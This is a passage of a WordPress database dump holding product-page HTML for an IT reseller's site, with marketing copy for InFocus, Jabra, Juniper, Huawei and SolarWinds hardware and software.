an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.</p><h3 style=\"text-align: center;\"><strong>MONDOPAD ULTRA</strong></h3><p style=\"text-align: center;\">The complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and moreâ€”all from one seamlessly integrated platform.</p><h3 style=\"text-align: center;\"><strong>Mondopad Launch</strong></h3><p style=\"text-align: center;\">Fully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interfaceâ€”so that you can quickly access your favorite apps or tools in any group workspace.</p><h3 style=\"text-align: center;\"><strong>Mondopad Core</strong></h3><p style=\"text-align: center;\">The easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the webâ€”Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.</p>		\n			<h2>JTouch</h2>		\n		<h3 style=\"text-align: center;\">Touchscreens that Enhance Collaboration &amp; Captivate Audiences</h3><p style=\"text-align: center;\">Whether youâ€™re in a classroom or huddle space, a conference room or auditorium, thereâ€™s a JTouch interactive display solution to fit your needs and engage your audience.</p><h4><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\" alt=\"\" width=\"300\" height=\"200\" /></h4>		\n			<h2>Key Features</h2>		\n		<ul><li>Incredibly sharp 4K or 1080p HD resolution</li><li>Content is interactive, bright and crisp in any light</li><li>Run all your apps, even the older ones, with touch</li><li>Accurate and responsive touch overlay with multi-touch capability</li></ul><ul><li>Wirelessly cast from any device, browse the web, or view documents</li><li>Create and share on an interactive whiteboard</li><li>No calibration required</li><li>Available in sizes ranging from 55- to 86-inches</li></ul>		\n		<h3 style=\"text-align: center;\"><strong>Projectors</strong></h3><p style=\"text-align: center;\">Office to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.</p><h3 style=\"text-align: center;\"><strong>Classroom Projectors</strong></h3><p style=\"text-align: center;\">Incredible Value and Connectivity</p><h3 style=\"text-align: center;\"><strong>Meeting Room</strong></h3><p style=\"text-align: center;\">Superior Performance and Quality for Business</p><h3 style=\"text-align: center;\"><strong>Portable Projectors</strong></h3><p style=\"text-align: center;\">Compact, Lightweight, Powerful</p><h3 style=\"text-align: center;\"><strong>Large Venue Projectors</strong></h3><p style=\"text-align: center;\">High-performance projectors</p><h2 style=\"text-align: center;\">Jupiter by InFocus</h2><p style=\"text-align: center;\">The ability to see everything thatâ€™s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.</p><h2 style=\"text-align: center;\"><strong>ConX Cloud</strong></h2><p style=\"text-align: center;\">ConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Infocus','','publish','closed','closed','','infocus','','','2019-10-02 17:37:33','2019-10-02 09:37:33','',0,'https://bintara.com.my/?page_id=1531',0,'page','',0),(1532,1,'2018-12-11 15:36:49','2018-12-11 07:36:49','<h1 style=\"text-align: center;\"><strong>Jabra</strong></h1><h3 style=\"text-align: center;\">Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-20x20.jpg 20w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul>		\n		<h2 style=\"text-align: center;\"><strong>Jabra Evolve 65t</strong></h2><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" width=\"163\" height=\"163\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" width=\"203\" height=\"203\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 80</strong></h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75e</strong></h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" width=\"205\" height=\"205\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" width=\"201\" height=\"201\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75</strong></h2><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 65 Stereo / Mono</strong></h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" width=\"203\" height=\"203\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" width=\"209\" height=\"209\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 40 Stereo / Mono</strong></h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 30 Stereo / Mono</strong></h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"200\" height=\"200\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"216\" height=\"216\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 Stereo / Mono</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 SE</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png\" alt=\"\" width=\"204\" height=\"204\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png\" alt=\"\" width=\"219\" height=\"249\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Engage 50</strong></h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform â€“ whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.</p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p>		\n		<h2><strong>Jabra Biz Wired Series</strong></h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.</h3><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"179\" height=\"179\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg\" alt=\"\" width=\"195\" height=\"195\" /></p><h2 style=\"text-align: center;\">Jabra BIZ 2400 II Mono 3-in-1</h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II DUO</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"188\" height=\"188\" /></p>https://youtu.be/85RJqPjfjng		\n		<p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"197\" height=\"197\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300</strong></h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD</strong></h2><p>Jabra Bizâ„¢ 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD.png\" alt=\"\" width=\"186\" height=\"186\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"188\" height=\"188\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD DUO</strong></h2><p>Jabra Bizâ„¢ 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500</strong></h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD.png\" alt=\"\" width=\"197\" height=\"197\" /></p><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB.png\" alt=\"\" width=\"190\" height=\"190\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500 DUO USB</strong></h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Jabra','','publish','closed','closed','','jabra','','','2019-10-03 15:42:00','2019-10-03 07:42:00','',0,'https://bintara.com.my/?page_id=1532',0,'page','',0),(1533,1,'2018-12-11 15:37:13','2018-12-11 07:37:13','<div class=\"main-headline ng-star-inserted\">\r\n<h3 class=\"ng-star-inserted\">Solutions</h3>\r\n</div>\r\n<div class=\"main-body ng-star-inserted\">\r\n<p class=\"main-body-item ng-star-inserted\">Advanced technologies engineered to help you solve the toughest challenges in networking.</p>\r\n\r\n</div>\r\n<h3>Switching</h3>\r\n<h4>EX Series Ethernet Switches</h4>\r\nThese cloud-grade switches are designed for the converged enterprise branch, campus, and data center, and for service providers. They address growing enterprise demands for high availability, unified communications, and virtualization.\r\n<h4>QFX Series</h4>\r\nQFX Series switches satisfy the needs of todayâ€™s most demanding enterprise and service provider data center environments. This high-performance, high-density platform is designed for top-of-rack, end-of-row, and spine-and-core aggregation deployments.\r\n<h4>Data Center Switching Architectures</h4>\r\nJuniper switches provide the high-performance, high-density platforms required to build innovative data center fabrics that scale to thousands of ports.\r\n\r\n&nbsp;\r\n<h3>Wireless</h3>\r\n<h4>Aerohive Wireless LANs</h4>\r\nCloud-managed Wi-Fi access points, available from Juniper, that boost coverage and capacity. A distributed control mechanism eliminates the need for separate wireless controllers, streamlining your wireless infrastructure.\r\n<h4>Mist Learning Wireless LAN</h4>\r\nA machine learning-based wireless LAN solution that improves your Wi-Fi management and provides real-time information on end users and their mobile devices.\r\n\r\n&nbsp;\r\n<h3>Routers</h3>\r\n<h4>MX Series 5G Universal Routing Platform</h4>\r\nA robust portfolio of SDN-enabled routing platforms that provide industry-leading system capacity, density, and performance with unparalleled longevity. MX Series routers are key to digital transformation for service providers, cloud operators, and enterprises.\r\n<h4>PTX Series Packet Transport Routers</h4>\r\nPTX Series routers form the foundation of the Converged SupercoreÂ® architecture, providing performance, optical transport integration, and elegant deployment. They support high-density 100GbE environments, with energy efficiency of less than half a watt per Gbps.\r\n<h4>ACX Series Universal Metro Routers</h4>\r\nMEF CE 2.0-compliant hardened routers address use cases of business Ethernet services, residential aggregation, small cell, mobile backhaul, and industrial field area networks.\r\n<h4>CTP Series Circuit to Packet Platforms</h4>\r\nThese platforms give time-division multiplexing (TDM) and serial and analog circuit-based applications reliable and efficient access to next-generation IP networks with all of their cost, redundancy, and efficiency advantages.\r\n<h4>T4000 Core Router</h4>\r\nThe T4000 Core Router is a true multiservice core system that delivers reliable and flexible core backbone architecture to carry a wide breadth of services over a common IP/MPLS infrastructure.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Juniper','','publish','closed','closed','','juniper','','','2018-12-17 14:29:28','2018-12-17 06:29:28','',0,'https://bintara.com.my/?page_id=1533',0,'page','',0),(1534,1,'2018-12-11 15:36:08','2018-12-11 07:36:08','<h2>Enterprise Wireless</h2><h4>Intelligent Wireless Connections, Building Digital Industries</h4><h3 style=\"text-align: center;\"><strong>What Are the Benefits of the Enterprise Wireless?</strong></h3><ul><li>Multiple Services on One Network</li><li>Industrial-Grade Reliability</li><li>Access Anytime and Anywhere</li></ul><p style=\"text-align: left;\">Huawei uses leading 4.5G wireless technologies and its in-depth understanding of industry customers to provide the eLTE Multimedia Critical Communications System (MCCS) Solution, the 4.5G-based eLTE narrowband and broadband integrated wireless IoT solution, and the GSM-R solution for a wide range of services, such as narrowband, broadband, voice, multimedia, fixed, and mobile. Huawei also builds a professional and reliable mobile communications platform for diverse industry applications, such as professional trunking voice, wireless video surveillance, broadband data access, mass data collection, railway wireless dispatching, and high-speed train control.</p><h2 style=\"text-align: center;\">Enterprise Routers</h2><p style=\"text-align: center;\">Routers with large-capacity, high-reliability, easy O&amp;M, and low power consumption help enterprises in various industries to quickly achieve digital transformation.</p><h3 style=\"text-align: center;\">NE Series Routers</h3><p>Highest performance routers to power innovative enterprise applications from small to super huge scale. Carrier-grade reliability, flexible modular architecture, and energy-efficient technologies add up to great service at lowest TCO.</p><h3 style=\"text-align: center;\">ME60 Series</h3><p>2T hardware platform, providing 10G to 480G line cards (including 160G CGN line cards), supporting a maximum of 256K concurrent users and allowing 1,200 users to go online per second.</p><h3 style=\"text-align: center;\">PTN 7900 Series</h3><p>The OptiX PTN 7900 NE is a new-generation high-capacity, high-bandwidth, and software-defined core device that supports smart services.</p><h3 style=\"text-align: center;\">AR502 Series IoT Gateways</h3><p>The AR502 uses the built-in industrial-grade LTE module, and offers high bandwidth and low-latency wireless access. It provides various local interfaces and applies to a number of IoT fields, such as smart grid, smart city, and smart building.</p><h3 style=\"text-align: center;\">AR1200 Series Enterprise Routers</h3><p>The AR1200 is a multi-service router designed for Small and Medium-sized Enterprises (SMEs). It provides Internet access, dedicated line access, and voice, security, and wireless functions. It can be deployed at the egress of small and medium-sized campus networks and the headquarters and branches of SMEs.</p>		\n			<h2>Why Huawei Routers?</h2>		\n		<h3 style=\"text-align: center;\"><strong>Leading Market Share</strong></h3><p>Huawei routers ranked No. 1 in China and No. 2 in the global market, and 70% of carriers and enterprise network NAs use them.</p><h3 style=\"text-align: center;\"><strong>Strong Development Capabilities</strong></h3><p>Huawei is a leader and outstanding contributor in the IP standards field. Its proprietary Solar chipset had large-scale commercial use on the live network in 2013 and more than 3 million chips were delivered, and the Huawei-proprietary VRP software is the culmination of 17 years of innovation.</p><h3 style=\"text-align: center;\"><strong>Award Winning Products</strong></h3><p>Huawei routers have won multiple international awards, including SDN-VDC InfoVision award and Japanâ€™s Interop gold award, and they have obtained certification from multiple third-party authoritative organizations worldwide.</p>		\n		<h2 style=\"text-align: center;\">Switches</h2>For a wide variety of applications and networkÂ sizes, fromÂ cloud data centers to campus networks<h3 style=\"text-align: center;\"><strong>Campus Switches</strong></h3><p>Huaweiâ€™s self-developed, innovative data center, campus, and carrier switch portfolios help accelerate your digital transformation.</p><h3 style=\"text-align: center;\"><strong>Data Center Switches</strong></h3><p>CloudEngine series switches offer carrier-grade reliability, virtualization support, iStack clustering, and Software-Defined Networking features for building and scaling data centers and campus networks. They provide versatility and resilient performance for server-based multimedia applications, Big Data analytics, and cloud computing.</p>		\n			<h2>Why Huawei Switches?</h2>		\n		<h3 style=\"text-align: center;\"><strong>Diversified Products and Solutions</strong></h3><p>Huawei provides the most complete portfolio of data center network and campus products, supporting customers business requirements for digital transformation and enabling their rapid growth of virtualization, Big Data, and cloud services.</p><h3 style=\"text-align: center;\"><strong>Extensive Customer Cases</strong></h3><p>Huawei switches have been deployed for enterprises in more than 150 countries and are widely used in sectors such as finance, Internet, retail, education, manufacturing, and public services. Huaweiâ€™s data center network and wired and wireless convergence solutions are rated as Challenger and Visionary in Gartnerâ€™s Magic Quadrant, respectively.</p><h3 style=\"text-align: center;\"><strong>Many Global Channels and Localized Services</strong></h3><p>Huawei switches support tens of thousands of channels and partners in 150 countries, providing innovative switch solutions in all industries and localized services.</p>		\n		<h2 style=\"text-align: center;\">Servers - Intelligent Computing</h2><p style=\"text-align: center;\">Boundless Computing Inspires an Intelligent Digital World.</p><h3 style=\"text-align: center;\"><strong>FusionServer 2488H V5 Rack Server</strong></h3><p>The FusionServer 2488H V5 is Huaweiâ€™s latest 2U 4-socket rack server. It is ideal for compute-intensive scenarios such as virtualization, High-Performance Computing (HPC), database, and SAP HANA.</p><h3 style=\"text-align: center;\"><strong>TaiShan 2280 ARM Server</strong></h3><p>A 2U, 2-socket rack server powered by Huawei 64-bit ARMv8 Hi1616 processors that provides high performance with low power consumption.</p><h3 style=\"text-align: center;\"><strong>FusionServer G5500 Data Center Heterogeneous Server</strong></h3><p>FusionServer G5500 is a heterogeneous server positioned for data center deployment. It offers the best-in-class heterogeneous computing platform for scenarios such as Artificial Intelligence (AI), HPC, intelligent cloud, video analytics, and database acceleration.</p><h3 style=\"text-align: center;\"><strong>Huawei FusionCube HCI</strong></h3><p>Huawei FusionCube HCI (Hyper-Converged Infrastructure) is an IT platform based on a hyper-converged architecture. It complies with open architecture standards, converges compute and storage, and pre-integrates distributed storage engines, virtualization, and cloud management software, allowing for resource-on-demand provisioning and linear expansion.FusionCube HCI supports various hardware form factors including blade, high-density, and rack, meeting the flexible configuration requirements of different services for compute, storage, and I/O resources. The FusionCube HCI applies to cloud computing scenarios and is an ideal choice for deploying the IT infrastructure of cloud data centers.</p><h3 style=\"text-align: center;\"><strong>KunLun Mission Critical Server</strong></h3><p>KunLun is designed for mission-critical workloads and is ideal for core databases, database application consolidation, in-memory computing, High-Performance Computing (HPC) fat nodes, and more scenarios. With innovative RAS 2.0 technology, the server offers an open x86 ecosystem with the reliability of UNIX servers, helping customers move from closed to open architecture and unlock innovation potential.</p><h3 style=\"text-align: center;\"><strong>FX-Series FPGA Accelerator Cards</strong></h3>These accelerator cards provide high-performance compute power and high-bandwidth data connections, making them ideal for hardware-accelerated services.		\n			<h2>Why Huawei Servers?</h2>		\n		<h3 style=\"text-align: center;\"><strong>Efficient and Reliable</strong></h3><p>To ensure that we meet customer requirements for servers, Huawei implements stringent quality control across eight processes, including product planning, R&amp;D, supply chain management, and post-sales service. Before delivery, each product has undergone more than 2,000 hardware tests, 10,000 software tests, and 300 entry certifications.</p><h3 style=\"text-align: center;\"><strong>Continuous Innovation</strong></h3><p>Huaweiâ€™s Boundless Computing strategy accelerates innovation at the chip level across computing, storage, and networking technologies, moving enterprise intelligence toward a better-connected, smart world. Huawei has focused its years of R&amp;D development efforts by setting up global OpenLabs to collaborate with top partners.</p><h3 style=\"text-align: center;\"><strong>Trustworthy</strong></h3><p>Huawei successfully cooperates with customers and technology partners, striving to provide open computing infrastructure that supports optimal customer and partner outcomes. With solid reliability, excellent performance, and easy integration, Huawei servers are used by more than 5,000 customers worldwide in more than 25 sectors.</p>[maxbutton id=\"1\" ]','Huawei','','publish','closed','closed','','huawei','','','2019-10-02 15:54:44','2019-10-02 07:54:44','',0,'https://bintara.com.my/?page_id=1534',0,'page','',0),(1535,1,'2018-12-11 15:35:26','2018-12-11 07:35:26','','Houdini','','inherit','closed','closed','','1526-revision-v1','','','2018-12-11 15:35:26','2018-12-11 07:35:26','',1526,'https://bintara.com.my/blog/2018/12/11/1526-revision-v1/',0,'revision','',0),(1536,1,'2018-12-11 15:35:41','2018-12-11 07:35:41','','HP','','inherit','closed','closed','','1528-revision-v1','','','2018-12-11 15:35:41','2018-12-11 07:35:41','',1528,'https://bintara.com.my/blog/2018/12/11/1528-revision-v1/',0,'revision','',0),(1597,1,'2018-12-11 15:50:20','2018-12-11 07:50:20','<h1>SolarWinds: We Make IT Look Easy</h1>\r\nWe are a leading provider of powerful and affordable IT infrastructure management software. Our products give organizations worldwide, regardless of type, size or IT infrastructure complexity, the power to monitor and manage the performance of their IT environments, whether on-premises, in the cloud, or in hybrid models.\r\n<h2>PRODUCTS</h2>\r\n<h3>NETWORK MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Network Performance MonitorÂ </strong></li>\r\n</ol>\r\n<strong>Â <img class=\"alignnone wp-image-2459\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Network-Performance-Monitor-.png\" alt=\"\" width=\"388\" height=\"242\" /></strong>\r\n\r\nNetwork monitoring software designed to reduce network outages and improve performance.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor network monitoring</li>\r\n 	<li>Network Insights for deeper visibility</li>\r\n 	<li>Intelligent maps</li>\r\n 	<li>NetPath and PerfStack for easy troubleshooting</li>\r\n 	<li>Smarter scalability for large environments</li>\r\n 	<li>Advanced alerting</li>\r\n</ul>\r\n2.Â <strong>Network Configuration Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2460\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Network-Configuration-Manager.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nAutomate network configuration management and compliance, which can help save time and optimize IT resources.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Network automation</li>\r\n 	<li>Network compliance</li>\r\n 	<li>Configuration backup</li>\r\n 	<li>Vulnerability assessment</li>\r\n 	<li>Network Insights for Cisco ASA and Cisco Nexus</li>\r\n 	<li>Integration with Network Performance Monitor</li>\r\n</ul>\r\n3.Â <strong>ipMonitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2461\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipMonitor.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nEssential up/down and performance monitoring for networks, servers, and applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor network devices, servers, and applications from one console</li>\r\n 	<li>Receive alerts for availability and performance issues</li>\r\n 	<li>Monitor network status on maps and NOC view</li>\r\n 	<li>Minimize downtime by automating remediation actions</li>\r\n 	<li>Enhance monitoring with built-in reports and dashboards</li>\r\n</ul>\r\n4.Â <strong>IP Address Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2462\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/IP-Address-Manager.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nIP address management software designed to save time and prevent costly errors.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automated IP address tracking</li>\r\n 	<li>Integrated DHCP, DNS, and IP address management</li>\r\n 	<li>IP address alerting, troubleshooting, and reporting</li>\r\n 	<li>Multi-vendor on-prem and cloud DHCP and DNS support</li>\r\n 	<li>IP Request Wizard for streamlining and automating IP address requests</li>\r\n 	<li>API support with CRUD operations for two-way integration with third-party software</li>\r\n</ul>\r\n5.Â <strong>User Device Tracker</strong>\r\n\r\n<img class=\"alignnone wp-image-2463\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/User-Device-Tracker.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nNetwork device tracking software that can locate users and devices on your network.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Quickly locate network devices</li>\r\n 	<li>Map and monitor WAPs, switches, and ports</li>\r\n 	<li>Manage switch and switch port capacity</li>\r\n 	<li>Detect rogue devices and users</li>\r\n 	<li>Turn ports on and off remotely</li>\r\n 	<li>Unified IT administration dashboard</li>\r\n</ul>\r\n6.Â <strong>NetFlow Traffic Analyzer</strong>\r\n\r\n<img class=\"alignnone wp-image-2464\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/NetFlow-Traffic-Analyzer.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nNetFlow analyzer and bandwidth monitoring software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Bandwidth monitoring</li>\r\n 	<li>Application traffic alerting</li>\r\n 	<li>Network traffic analysis</li>\r\n 	<li>Performance Analysis Dashboard</li>\r\n 	<li>CBQoS policy optimization</li>\r\n 	<li>Malicious or malformed traffic flow identification</li>\r\n</ul>\r\n7.Â <strong>VoIP and Network Quality Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2465\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VoIP-and-Network-Quality-Manager.png\" alt=\"\" width=\"378\" height=\"236\" />\r\n\r\nVoIP monitoring software designed for deep critical call QoS metrics and WAN performance insights.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Real-time WAN monitoring</li>\r\n 	<li>Troubleshoot VoIP call quality problems</li>\r\n 	<li>Visual VoIP call path trace</li>\r\n 	<li>Cisco VoIP gateway and PRI trunk monitoring</li>\r\n 	<li>Cisco SIP trunk monitoring</li>\r\n 	<li>Simplify IP SLA setup</li>\r\n</ul>\r\n<h3>SYSTEM MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\n<img class=\"alignnone wp-image-2466\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Server-Application-Monitor.png\" alt=\"\" width=\"389\" height=\"243\" />\r\n\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring 